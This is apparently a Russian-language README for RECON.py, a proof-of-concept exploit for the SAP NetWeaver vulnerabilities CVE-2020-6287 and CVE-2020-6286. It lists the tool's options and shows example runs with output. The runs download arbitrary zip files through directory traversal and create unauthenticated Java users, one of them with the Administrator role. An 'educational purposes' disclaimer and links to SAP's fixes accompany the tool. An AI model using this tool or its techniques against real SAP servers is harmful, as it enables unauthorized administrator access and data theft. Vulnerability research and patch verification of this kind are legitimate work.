
PoC для CVE-2020-6287, CVE-2020-6286 (уязвимость SAP RECON)
PoC для CVE-2020-6287, CVE-2020-6286 (уязвимость SAP RECON)
Пффф! RECON (Remotely Exploitable Code On NetWeaver)? Ребята, серьёзно? Это лучшее кодовое имя, которое вы придумали? :)
Этот скрипт позволяет проверить уязвимость отсутствия проверки авторизации в SAP LM Configuration Wizard, а в качестве PoC-скрипта эксплуатирует обход каталога в методе queryProtocol.
Обход каталога позволяет скачать любой zip-файл с SAP-сервера.
Этот проект создан исключительно в образовательных целях и не может быть использован для нарушения закона или личной выгоды.
Автор этого проекта не несёт ответственности за любой возможный вред, причинённый материалами этого проекта
Первооткрыватели:
CVE-2020-6287: Pablo Artuso
CVE-2020-6286: Yvan 'iggy' G.
Просто укажите hostnmae/ip сервера SAP NW AS Java.
Имеются дополнительные опции:
-c — проверить, уязвим ли SAP-сервер к RECON-f — скачать zip-файл с SAP-сервера-u — создать пользователя SAP JAVA с ролью Authenticated User-a — создать пользователя SAP JAVA с ролью AdministratorПример: скачивание zip-файла
~python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved
Пример: создание пользователя SAP JAVA
~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created
Пример: создание администратора SAP JAVA
~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created
~python RECON.py -h
usage: RECON.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-f ZIPFILE]
[-u] [-a] [--timeout TIMEOUT] [-v]
PoC for CVE-2020-6287, (RECON)
This scrip allows to check SAP LM Configuration Wizard missing authorization check vulnerability and exploits dir traversal in queryProtocol method
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy
Thanks:
- Spencer McIntyre https://twitter.com/zeroSteiner
Solution: https://launchpad.support.sap.com/#/notes/2934135, https://launchpad.support.sap.com/#/notes/2939665
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Java NW host (default: 127.0.0.1)
-P PORT, --port PORT Java NW web port (default: tcp/50000)
-p PROXY, --proxy PROXY
Use proxy (ex: 127.0.0.1:8080)
-s, --ssl enable SSL
-c, --check just detect vulnerability
-f ZIPFILE, --zipfile ZIPFILE
ZIP file to read. CVE-2020-6286
-u, --user Create simple JAVA user. CVE-2020-6287
-a, --admin Create JAVA user with role "Administrator". CVE-2020-6287
--timeout TIMEOUT HTTP connection timeout in second (default: 10)
-v, --verbose verbose mode